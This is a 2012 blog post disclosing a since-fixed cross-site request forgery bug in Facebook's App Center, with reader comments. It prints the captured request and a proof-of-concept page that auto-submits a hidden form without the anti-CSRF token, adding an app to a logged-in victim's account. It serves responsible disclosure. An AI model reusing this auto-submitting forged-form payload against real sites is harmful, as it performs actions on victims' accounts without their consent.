Sunday, 19 August 2012

Facebook CSRF worth USD 5000

This post is about a Cross-Site Request Forgery (CSRF) bug in Facebook that I recently reported and which is now fixed. One fine day, when I logged into Facebook, I noticed a new feature, "Appcenter", which lets you browse and add the apps you want. Game apps like FarmVille are the most popular.

I had previously worked on apps, so I decided to give this new feature a try. When the "Play Game" button of a game app was clicked, it generated a POST request:


POST /connect/uiserver.php HTTP/1.1
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:13.0) Gecko/20100101 Firefox/13.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Cookie: <user_cookies>
Content-Type: application/x-www-form-urlencoded
Content-Length: 800


This new feature adds many new parameters. 'fb_dtsg' is the anti-CSRF token and 'perms' lists the permissions the app requires. 'redirect_uri' and 'app_id' are app-specific values. The remaining parameters appear to be static except 'new_perms' and 'orig_perms'. I started playing with these two dynamic parameters and after a few attempts found that they were not needed to add an app at all.

An anti-CSRF token like 'fb_dtsg' is supposed to be validated server-side. I was shocked to see that in this new feature the developer had somehow missed this point: it was possible to add an app without 'fb_dtsg' at all. Since the browser attaches the session cookie to the request automatically, a form hosted on any third-party page could add an app to the victim's account. Bang!!

Final PoC for this CSRF looks like this:

<!-- Auto-submits the forged POST as soon as the page loads; the victim's browser adds the Facebook session cookie. -->
<body onload="document.forms[0].submit();">
<form action="" method="POST">
        <!-- Note: no fb_dtsg field at all -->
        <input type="hidden" name="perms" value="" />
        <input type="hidden" name="dubstep" value=1 />
        <input type="hidden" name="new_user_session" value=1 />
        <input type="hidden" name="grant_clicked" value=1 />
        <input type="hidden" name="send_to_mobile_redirect_uri" value="" />
        <input type="hidden" name="app_id" value="2389801228" />
        <input type="hidden" name="redirect_uri" value="" />
        <input type="hidden" name="app_center" value=1 />
        <input type="hidden" name="is_paid_app" value="" />
        <input type="hidden" name="app_center_ref" value="appcenter" />
        <input type="hidden" name="response_type" value="none" />
        <input type="hidden" name="from_post" value=1 />
        <input type="hidden" name="__uiserv_method" value="permissions.request" />
        <input type="hidden" name="grant_clicked" value="Play+Game" />
</form>
</body>

The same endpoint was used for other app types as well, such as music apps and developer apps. The Facebook Security team awarded $5000 for this bug.

Facebook was quick to address the issue and resolved it the very next day. I'm very thankful to the Facebook Security Team.


  1. Anti-CSRF tokens like 'fb_dtsg' supposed to get validated at server-side. I was shocked to see that in this new feature, somehow developer missed this point and it was possible to add app without 'fb_dtsg'. Bang!!

    Awesome Find mate !!

  2. Congrats buddy.You are awesome as usual. :)

  3. Congrats bro. Awesome finding. :)

  4. Guy, you're a genius because you TRIED it. I always believed that FB/Twitter are not that stupid to skip token verification, but now HAHAHA

    P.S. i love csrf

  5. +1 on Egors post. I would have thought "nah, if they check that token on five scripts, they check it on every script" :D
    Nice find and enjoy your additional months salary ;)

    Did you try to find an exploit by hand or use an automatic tool?

  6. Thanks everyone.
    @Egor, I think it was my lucky time. Btw, your work on CSRF is gr8
    @archi, I mostly do it manually with FF addons

  7. I was stunned to see that in this new function, somehow designer skipped this factor and it was possible to add app without 'fb_dtsg'.


  8. Well done, really impressive

    Keep the good work up !